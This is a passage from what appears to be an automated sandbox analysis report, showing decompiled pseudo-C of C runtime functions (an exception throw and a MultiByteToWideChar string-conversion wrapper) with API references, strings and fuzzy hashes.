                    				E013F4EC6(_t39 - 0x4c, 0x142fa1c);
                    				asm("int3");
                    				_push(4);
                    				E013F26C2(E0141538B);
                    				_t38 = _t35;
                    				 *((intOrPtr*)(_t39 - 0x10)) = _t38;
                    				 *_t38 = 0;
                    				 *((intOrPtr*)(_t38 + 4)) = 0;
                    				 *((intOrPtr*)(_t38 + 8)) = 0;
                    				 *(_t38 + 0x10) =  *(_t38 + 0x10) | 0xffffffff;
                    				 *((intOrPtr*)(_t38 + 0x14)) = 0;
                    				 *((intOrPtr*)(_t38 + 0x18)) = 0;
                    				_t30 =  *((intOrPtr*)(_t39 + 8));
                    				 *(_t39 - 4) = 1;
                    				_t36 =  *((intOrPtr*)(_t30 + 0x10));
                    				if( *((intOrPtr*)(_t30 + 0x14)) >= 0x10) {
                    					_t30 =  *_t30;
                    				}
                    				E013C487B(_t38, _t30, _t36,  *((intOrPtr*)(_t39 + 0xc)));
                    				return E013F269C(_t38);
                    			}









                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C1B4C
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C1B80
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • Clone() is not implemented yet., xrefs: 013C1B51
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$ExceptionException@8RaiseThrow
                    • String ID: Clone() is not implemented yet.
                    • API String ID: 1412866469-226299721
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E013FF33F(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
                    				char* _v8;
                    				int _v12;
                    				char _v16;
                    				char _v24;
                    				char _v28;
                    				void* __ebx;
                    				char _t34;
                    				int _t35;
                    				int _t38;
                    				long _t39;
                    				char* _t42;
                    				int _t44;
                    				int _t47;
                    				int _t53;
                    				intOrPtr _t55;
                    				void* _t56;
                    				char* _t57;
                    				char* _t62;
                    				char* _t63;
                    				void* _t64;
                    				int _t65;
                    				short* _t67;
                    				short* _t68;
                    				int _t69;
                    				intOrPtr* _t70;
                    
                    				_t64 = __edx;
                    				_t53 = _a12;
                    				_t67 = _a4;
                    				_t68 = 0;
                    				if(_t67 == 0) {
                    					L3:
                    					if(_a8 != _t68) {
                    						E013FEF21(_t53,  &_v28, _t64, _a16);
                    						_t34 = _v24;
                    						__eflags = _t67;
                    						if(_t67 == 0) {
                    							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                    							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                    								_t69 = _t68 | 0xffffffff;
                    								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
                    								__eflags = _t35;
                    								if(_t35 != 0) {
                    									L29:
                    									_t28 = _t35 - 1; // -1
                    									_t69 = _t28;
                    									L30:
                    									__eflags = _v16;
                    									if(_v16 != 0) {
                    										_t55 = _v28;
                    										_t31 = _t55 + 0x350;
                    										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
                    										__eflags =  *_t31;
                    									}
                    									return _t69;
                    								}
                    								 *((intOrPtr*)(E013FDB3A())) = 0x2a;
                    								goto L30;
                    							}
                    							_t70 = _a8;
                    							_t25 = _t70 + 1; // 0x1
                    							_t56 = _t25;
                    							do {
                    								_t38 =  *_t70;
                    								_t70 = _t70 + 1;
                    								__eflags = _t38;
                    							} while (_t38 != 0);
                    							_t69 = _t70 - _t56;
                    							goto L30;
                    						}
                    						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                    						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                    							_t69 = _t68 | 0xffffffff;
                    							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
                    							__eflags = _t35;
                    							if(_t35 != 0) {
                    								goto L29;
                    							}
                    							_t39 = GetLastError();
                    							__eflags = _t39 - 0x7a;
                    							if(_t39 != 0x7a) {
                    								L21:
                    								 *((intOrPtr*)(E013FDB3A())) = 0x2a;
                    								 *_t67 = 0;
                    								goto L30;
                    							}
                    							_t42 = _a8;
                    							_t57 = _t42;
                    							_v8 = _t57;
                    							_t65 = _t53;
                    							__eflags = _t53;
                    							if(_t53 == 0) {
                    								L20:
                    								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
                    								__eflags = _t44;
                    								if(_t44 != 0) {
                    									_t69 = _t44;
                    									goto L30;
                    								}
                    								goto L21;
                    							} else {
                    								goto L15;
                    							}
                    							while(1) {
                    								L15:
                    								_t45 =  *_t57;
                    								_v12 = _t65 - 1;
                    								__eflags =  *_t57;
                    								if(__eflags == 0) {
                    									break;
                    								}
                    								_t47 = E014094B1(__eflags, _t45 & 0x000000ff,  &_v24);
                    								_t62 = _v8;
                    								__eflags = _t47;
                    								if(_t47 == 0) {
                    									L18:
                    									_t65 = _v12;
                    									_t57 = _t62 + 1;
                    									_v8 = _t57;
                    									__eflags = _t65;
                    									if(_t65 != 0) {
                    										continue;
                    									}
                    									break;
                    								}
                    								_t62 = _t62 + 1;
                    								__eflags =  *_t62;
                    								if( *_t62 == 0) {
                    									goto L21;
                    								}
                    								goto L18;
                    							}
                    							_t42 = _a8;
                    							goto L20;
                    						}
                    						__eflags = _t53;
                    						if(_t53 == 0) {
                    							goto L30;
                    						}
                    						_t63 = _a8;
                    						while(1) {
                    							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
                    							__eflags =  *(_t68 + _t63);
                    							if( *(_t68 + _t63) == 0) {
                    								goto L30;
                    							}
                    							_t68 =  &(_t68[0]);
                    							_t67 =  &(_t67[1]);
                    							__eflags = _t68 - _t53;
                    							if(_t68 < _t53) {
                    								continue;
                    							}
                    							goto L30;
                    						}
                    						goto L30;
                    					}
                    					 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    					return E013FDA61() | 0xffffffff;
                    				}
                    				if(_t53 != 0) {
                    					 *_t67 = 0;
                    					goto L3;
                    				}
                    				return 0;
                    			}

                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,013C6AF3,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,013C6AF3,00000000), ref: 013FF3D5
                    • GetLastError.KERNEL32 ref: 013FF3E3
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,013C6AF3,00000000), ref: 013FF43E
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast
                    • String ID:
                    • API String ID: 1717984340-0
                    • Opcode ID: 1703ae6350e2829ec729c9855b425a9051d0fc43508870ed99aaf08923e7f1f9
                    • Instruction ID: a167463bec7a73469bc962b1df0a2ba99704d0d6d3c2be2171d34386b4ea0f2a
                    • Opcode Fuzzy Hash: 1703ae6350e2829ec729c9855b425a9051d0fc43508870ed99aaf08923e7f1f9
                    • Instruction Fuzzy Hash: 5741C332604256AFDB329F6CC844ABA7BADEF01328F15416DEF59A72E5DB318901C760
                    Uniqueness

                    Uniqueness Score: -1.00%